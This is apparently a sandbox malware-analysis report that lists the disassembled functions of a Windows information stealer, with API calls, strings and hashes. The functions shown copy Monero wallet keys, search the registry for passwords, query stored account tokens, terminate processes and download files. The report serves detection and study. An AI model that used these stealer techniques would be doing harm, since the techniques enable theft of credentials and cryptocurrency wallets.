                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 469a296377318270d4db4b2bbb2df738d4dff8ce93a586b5cc56579ae783b82d
                                  • Instruction ID: 8cb272cf1a3ffd41c88e817c6ed20fdebbbfa80063c03eeb7e3f60b84e7c72d8
                                  • Opcode Fuzzy Hash: 469a296377318270d4db4b2bbb2df738d4dff8ce93a586b5cc56579ae783b82d
                                  • Instruction Fuzzy Hash: EB7156B6910208BBDB54EBE0DD99FEE777AAB88300F00459CF61697141EB34DB44CB65
                                  Function 006B1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006B12B4
                                    • Part of subcall function 006B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 006B12BB
                                    • Part of subcall function 006B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006B12D7
                                    • Part of subcall function 006B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006B12F5
                                    • Part of subcall function 006B12A0: RegCloseKey.ADVAPI32(?), ref: 006B12FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 006B134F
                                  • lstrlen.KERNEL32(?), ref: 006B135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 006B1377
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 006B1465
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 006B14EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 5b59d5c91d19928efccbc9e17a54e463a5d617837eab7741f13eb19c69f4b70a
                                  • Instruction ID: 06e5bcef74dd97e35b7efabc8c7b8a3c3782bc5deee038f636c8aa1a3ad4158e
                                  • Opcode Fuzzy Hash: 5b59d5c91d19928efccbc9e17a54e463a5d617837eab7741f13eb19c69f4b70a
                                  • Instruction Fuzzy Hash: 5A512FB1D5011C5BCB55EBA0DDA2FFD737EDB54304F40459CB60A62192EE306B88CBAA
                                  Function 006B7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006B7330: memset.MSVCRT ref: 006B7374
                                    • Part of subcall function 006B7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006B739A
                                    • Part of subcall function 006B7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006B7411
                                    • Part of subcall function 006B7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 006B746D
                                    • Part of subcall function 006B7330: GetProcessHeap.KERNEL32(00000000,?), ref: 006B74B2
                                    • Part of subcall function 006B7330: HeapFree.KERNEL32(00000000), ref: 006B74B9
                                  • lstrcat.KERNEL32(00000000,006D192C), ref: 006B7666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 006B76A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 006B76BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 006B76EF
                                  • lstrcat.KERNEL32(00000000,006D1934), ref: 006B7700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 006B7733
                                  • lstrcat.KERNEL32(00000000,006D1938), ref: 006B774D
                                  • task.LIBCPMTD ref: 006B775B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 8c70c8fd06d393abc09239e0ec277dc1e140a1f6a6d23f52f5500a10325e1892
                                  • Instruction ID: 7636402b35409f1f854d5ef650ff5d5af90075bb728d9062b065e5453d17f2dd
                                  • Opcode Fuzzy Hash: 8c70c8fd06d393abc09239e0ec277dc1e140a1f6a6d23f52f5500a10325e1892
                                  • Instruction Fuzzy Hash: B43160B1D18209EFDB04EFE4DCA5DFEB37AEB44301B204118F116673A1DA34A986EB54
                                  Function 006B7330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 006B7374
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 006B739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006B7411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 006B746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006B74B2
                                  • HeapFree.KERNEL32(00000000), ref: 006B74B9
                                  • task.LIBCPMTD ref: 006B75B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: Password
                                  • API String ID: 2808661185-3434357891
                                  • Opcode ID: 18aaeee0e42ba0ee5120b535820701badc265ff82d55e10eb87c954cc7fa51b7
                                  • Instruction ID: 29c270f22943ae86b102a227e00acb04b6f8f015b1c5a4cd06c39138a451b20a
                                  • Opcode Fuzzy Hash: 18aaeee0e42ba0ee5120b535820701badc265ff82d55e10eb87c954cc7fa51b7
                                  • Instruction Fuzzy Hash: 8A61FBB5D141689BDB24DB50CC55BD9B7B9BF44300F0081E9E649A7241EFB06BC9CFA4
                                  Function 006B9E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006C8CF0: GetSystemTime.KERNEL32(006D0E1B,0147A3C0,006D05B6,?,?,006B13F9,?,0000001A,006D0E1B,00000000,?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006C8D16
                                  • wsprintfA.USER32 ref: 006B9E7F
                                  • memset.MSVCRT ref: 006B9EED
                                  • lstrcat.KERNEL32(00000000,?), ref: 006B9F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 006B9F17
                                  • lstrcat.KERNEL32(00000000,006D12D8), ref: 006B9F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 006B9F7C
                                  • memset.MSVCRT ref: 006B9F9C
                                  • Sleep.KERNEL32(00001388), ref: 006BA013
                                    • Part of subcall function 006C99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C99C5
                                    • Part of subcall function 006C99A0: Process32First.KERNEL32(006BA056,00000128), ref: 006C99D9
                                    • Part of subcall function 006C99A0: Process32Next.KERNEL32(006BA056,00000128), ref: 006C99F2
                                    • Part of subcall function 006C99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C9A4E
                                    • Part of subcall function 006C99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 006C9A6C
                                    • Part of subcall function 006C99A0: CloseHandle.KERNEL32(00000000), ref: 006C9A79
                                    • Part of subcall function 006C99A0: CloseHandle.KERNEL32(006BA056), ref: 006C9A88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 3242155833-2746444292
                                  • Opcode ID: 14aeb2def45811680aa7a2f3a2edfecc4ae42b72b57797afb4915981df3f5f2b
                                  • Instruction ID: f407d5fbb3055edeb7196d84cb341ed462304a3a16ac37012cd2abcc6fc1126b
                                  • Opcode Fuzzy Hash: 14aeb2def45811680aa7a2f3a2edfecc4ae42b72b57797afb4915981df3f5f2b
                                  • Instruction Fuzzy Hash: 3051A8B1954308ABDB24DBA0DC89FEA7379AF44704F00459CB60DAB2C1EB75AB84CF55
                                  Function 006B60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                    • Part of subcall function 006B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                  • InternetOpenA.WININET(006D0DFB,00000001,00000000,00000000,00000000), ref: 006B615F
                                  • StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B6197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 006B61DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006B6203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 006B622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006B625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 006B6299
                                  • InternetCloseHandle.WININET(?), ref: 006B62A3
                                  • InternetCloseHandle.WININET(00000000), ref: 006B62B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: d32b206eff1672b0e3b57f16269fdc842326bc441b505ee26acfbf911eec0e1f
                                  • Instruction ID: 23d79ab06d58fa4c56d976cb8c6d0b419e6880f8b3ccb5e414996e37662842b3
                                  • Opcode Fuzzy Hash: d32b206eff1672b0e3b57f16269fdc842326bc441b505ee26acfbf911eec0e1f
                                  • Instruction Fuzzy Hash: 2C5152B1A14208ABEF20DF94DC49FEEB77AAB44305F104098F605A7281DB74AF85DF95
                                  Function 0073012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 0073024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 0073035B
                                  • CatchIt.LIBVCRUNTIME ref: 007303AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 007304C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: 5cb1454122c74192a6ac8a3622c2c36f2c0ad4cd9994a20917deae20281d5c06
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: FAB19C71C00219EFEF19DFA4D8A99AEBBB5BF05310F10416AE9116B213D338DA51CBD1
                                  Function 006BBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                  • lstrlen.KERNEL32(00000000), ref: 006BBC6F
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 006BBC9D
                                  • lstrlen.KERNEL32(00000000), ref: 006BBD75
                                  • lstrlen.KERNEL32(00000000), ref: 006BBD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: c6900aceadc564c768ee95eb4490fb3c10d9907f6e337e42d4305bf4f096f2b0
                                  • Instruction ID: 0d05bc949545790cd33d98f98e9bc38abc6dacdec62f01729e8c145b357544ff
                                  • Opcode Fuzzy Hash: c6900aceadc564c768ee95eb4490fb3c10d9907f6e337e42d4305bf4f096f2b0
                                  • Instruction Fuzzy Hash: 41B11C72910108ABCB54EBE0DCA6FFE733AEF14308F40455DF50666191EE74AE48CB6A
                                  Function 006C6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
